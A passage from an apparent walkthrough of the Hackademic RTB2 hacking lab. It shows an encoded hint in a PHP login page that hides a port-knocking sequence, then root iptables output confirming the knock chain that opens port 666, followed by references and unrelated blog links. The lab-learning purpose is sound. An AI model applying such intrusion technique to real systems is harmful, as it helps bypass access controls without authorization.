'%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A'; echo '</font color="black">';}else{ echo '<h2>'; echo 'You are trying to login with wrong credentials!'; echo '<br>'; echo '</h2>'; echo "Please try again...";}?>
PORT KNOCKING
root@HackademicRTB2:~# iptables -L -n -viptables -L -n -vChain INPUT (policy ACCEPT 16 packets, 2935 bytes) pkts bytes target prot opt in out source destination 0 0 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:666 recent: CHECK name: PHASE4 side: source 39 2512 ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state ESTABLISHED 0 0 ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: UPDATE name: PHASE1 side: source 0 0 tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1001 recent: SET name: PHASE1 side: source 0 0 INTO-PHASE2 tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1101 recent: CHECK name: PHASE1 side: source 0 0 INTO-PHASE3 tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1011 recent: CHECK name: PHASE2 side: source 0 0 INTO-PHASE4 tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1001 recent: CHECK name: PHASE3 side: source 0 0 REJECT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:666 reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 57 packets, 5293 bytes) pkts bytes target prot opt in out source destination Chain INTO-PHASE2 (1 references) pkts bytes target prot opt in out source destination 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: REMOVE name: PHASE1 side: source 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: SET name: PHASE2 side: source 0 0 LOG all -- * * 0.0.0.0/0 0.0.0.0/0 LOG flags 0 level 4 prefix `INTO PHASE2: ' Chain INTO-PHASE3 (1 references) pkts bytes target prot opt in out source destination 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: REMOVE name: PHASE2 side: source 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: SET name: PHASE3 side: source 0 0 LOG all -- * * 0.0.0.0/0 0.0.0.0/0 LOG flags 0 level 4 prefix `INTO PHASE3: ' Chain INTO-PHASE4 (1 references) pkts bytes target prot opt in out source destination 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: REMOVE name: PHASE3 side: source 0 0 all -- * * 0.0.0.0/0 0.0.0.0/0 recent: SET name: PHASE4 side: source 0 0 LOG all -- * * 0.0.0.0/0 0.0.0.0/0 LOG flags 0 level 4 prefix `INTO PHASE4: '
References
- http://www.aldeid.com/wiki/Hackademic-RTB2
- https://www.rcesecurity.com/2012/01/hackademicrtb2-and-the-art-of-port-knocking/
- https://wiki.archlinux.org/index.php/Port_Knocking
- Lab - Hackademic -RTB2
- Hackademic Challenges教程
- Lab
- LAB
- CSAPP LAB---Proxy lab
- lab LAN
- vulnerability-lab
- ODI Lab
- Bomb lab
- Pande Lab
- lab 2
- Tcl lab
- Security Lab
- Crypto LAB
- Lab - Darknet
- Lab - ZorZ
- Data Lab
- Lab模型
- iOS设置tableViewCell不能点击
- HDU 1113 — Word Amalgamation
- Myeclipse快捷键
- hdu 5137 How Many Maos Does the Guanxi Worth 2014ACM/ICPC亚洲区广州站
- JavaScript——对象
- Lab - Hackademic -RTB2
- Python3.x爬虫教程:爬网页、爬图片、自动登录
- LeetCode || Implement Stack using Queues
- iOS在控制器导航栏右上角添加按钮
- BZOJ1975【左偏树】
- iphone开发:为已经建立的项目添加coredata
- Java基础——String类、StringBuffer、Integer
- servlet的运行过程
- NYOJ 5Binary String Matching(带题目大意)